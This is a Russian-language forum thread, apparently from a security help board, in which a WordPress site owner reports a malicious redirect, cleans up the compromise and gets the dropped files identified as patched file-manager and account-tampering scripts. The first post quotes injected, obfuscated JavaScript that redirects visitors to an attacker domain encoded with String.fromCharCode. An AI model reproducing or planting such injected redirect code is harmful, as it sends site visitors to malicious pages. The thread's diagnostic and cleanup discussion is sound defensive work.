PDA

Просмотр полной версии : Редирект при открытии сайта Вирус?



Redje
13.12.2021, 18:17
Сайт на WP.
При попытке открыть сайт, происходит редирект сначала на

https://trick.trainresistor.cc/come.php?id=76967-55-43567896-4
потом на

https://fingerprintopuch.best/go/gzstiodbga5dkobsgy?subid3=plerk&=8&subid4=coffein
и вываливается кусок кода

window.stop(); function _0x4165(_0x1c7833,_0x312763){var _0x384719=_0x3847();return _0x4165=function(_0x4165ff,_0x4cb21c){_0x4165ff=_0 x4165ff-0x185;var _0x3edf04=_0x384719[_0x4165ff];return _0x3edf04;},_0x4165(_0x1c7833,_0x312763);}var _0x2ca8a2=_0x4165;(function(_0x538cc7,_0x2ae31a){v ar _0x173fc3=_0x4165,_0x5b6817=_0x538cc7();while(!![]){try{var _0x1b9268=parseInt(_0x173fc3(0x18e))/0x1+parseInt(_0x173fc3(0x191))/0x2*(parseInt(_0x173fc3(0x18d))/0x3)+parseInt(_0x173fc3(0x18f))/0x4+-parseInt(_0x173fc3(0x189))/0x5*(-parseInt(_0x173fc3(0x18c))/0x6)+-parseInt(_0x173fc3(0x186))/0x7+-parseInt(_0x173fc3(0x187))/0x8*(parseInt(_0x173fc3(0x18a))/0x9)+parseInt(_0x173fc3(0x18b))/0xa;if(_0x1b9268===_0x2ae31a)break;else _0x5b6817['push'](_0x5b6817['shift']());}catch(_0x1fc706){_0x5b6817['push'](_0x5b6817['shift']());}}}(_0x3847,0xe77a1));var ll=_0x2ca8a2(0x190);document[_0x2ca8a2(0x188)][_0x2ca8a2(0x185)]=ll,window[_0x2ca8a2(0x188)][_0x2ca8a2(0x192)](ll);function _0x3847(){var _0x786271=['688400bYXEDO','replace','href','5956636QUrnAb','4 7696JxEbld','location','296330XygErO','2358VtSkab' ,'19357140uMcgeD','18tMFlRH','3cAvVrX','231172tCDM yi','2688948VEEIEX',String.fromCharCode(104,116,11 6,112,115,58,47,47,116,114,105,99,107,46,116,114,9 7,105,110,114,101,115,105,115,116,111,114,46,99,99 ,47,97,46,112,104,112,63,115,105,100,61,49,49,49,4 9,49,49,38,117,116,109,95,115,111,117,114,99,101,6 1,55,53,52,56,52,53)];_0x3847=function(){return _0x786271;};return _0x3847();}

Чем может быть вызвано?
Вирус?

Провекрка Aibolit ничего не дала.
А вот Eset 32 ругается при открытии сайта

Aleksandra
24.12.2021, 13:21
Сделайте полный бэкап сайта вместе с БД и ссылку мне в личку.

Redje
24.12.2021, 13:48
Сделайте полный бэкап сайта вместе с БД и ссылку мне в личку.

Добрый день.
Уже решил вопрос.
Спасибо!

Aleksandra
24.12.2021, 13:58
Каким образом?

Redje
24.12.2021, 16:20
Каким образом?
Установил примерную дату заражения. Посмотрел в какие файлы были внесены изменения с того момента. Установил ip злоумышленника, по логам посмотрел к каким файлам он обращался.
К сожалению, бэкапа предшествовавшего моменту заражения уже не было, поэтому восстановил сайт из бэкапа на момент, когда сайт еще открывался, но был уже заражен.
Закрыл доступ к сайту в htaccess. Удалил зараженные файлы. Удалил папки с шаблоном и плагинами по которым была зафиксирована активность злоумышленника.
Обновил сайт, заново установил шаблон и плагины, удалил учётные запись созданную злоумышленником, поменял пороли. Установил дополнительные плагины для повышения устойчивости сайта к взлому. В htaccess прописал директивы ограничивающие изменения в файлах только моим IP. Открыл доступ к сайту.
Пока рецидивов - нет.

Aleksandra
25.12.2021, 07:52
Удалил зараженные файлы.
Если у вас остались эти файлы, можете скинуть мне их в личку?

Redje
25.12.2021, 19:19
Если у вас остались эти файлы, можете скинуть мне их в личку?

Отправил ссылку в личку.
Если не затруднит поделитесь потом тем, что узнаете.
Чтобы хотя бы знать, что это и как называется )

Aleksandra
27.12.2021, 08:37
Отправил ссылку в личку.
Если не затруднит поделитесь потом тем, что узнаете.
Чтобы хотя бы знать, что это и как называется )
Хорошо, спасибо.

Aleksandra
30.12.2021, 07:55
Патченный https://github.com/prasathmani/tinyfilemanager/, а второй патченный https://gist.github.com/ilaraujo/e65c14599231f8a7ea5a84a7c2bd9598

Один это полноценный файловый менеджер, другой в основном предназначен для манипуляции с аккаунтами WP.

Детект с комментариями на VT:

https://www.virustotal.com/gui/file/a098ed2abb8104579712e560d747ce24aff08ac452391af196 bfa58748ae6efb
https://www.virustotal.com/gui/file/85a1fecfde70931dfdeaaa3cb5c243d9285e266661ab2ffe1c 362cba7ef76c8f

Redje
03.01.2022, 20:38
Патченный https://github.com/prasathmani/tinyfilemanager/, а второй патченный https://gist.github.com/ilaraujo/e65c14599231f8a7ea5a84a7c2bd9598

Один это полноценный файловый менеджер, другой в основном предназначен для манипуляции с аккаунтами WP.

Детект с комментариями на VT:

https://www.virustotal.com/gui/file/a098ed2abb8104579712e560d747ce24aff08ac452391af196 bfa58748ae6efb
https://www.virustotal.com/gui/file/85a1fecfde70931dfdeaaa3cb5c243d9285e266661ab2ffe1c 362cba7ef76c8f
Спасибо!
Весьма познавательно.

Хотелось бы еще уточнить, а код который вываливался после редиректа, который был внедрен на сайт, что из себя представляет. Он в первом посте.
Т.е. какова была цель злоумышленника?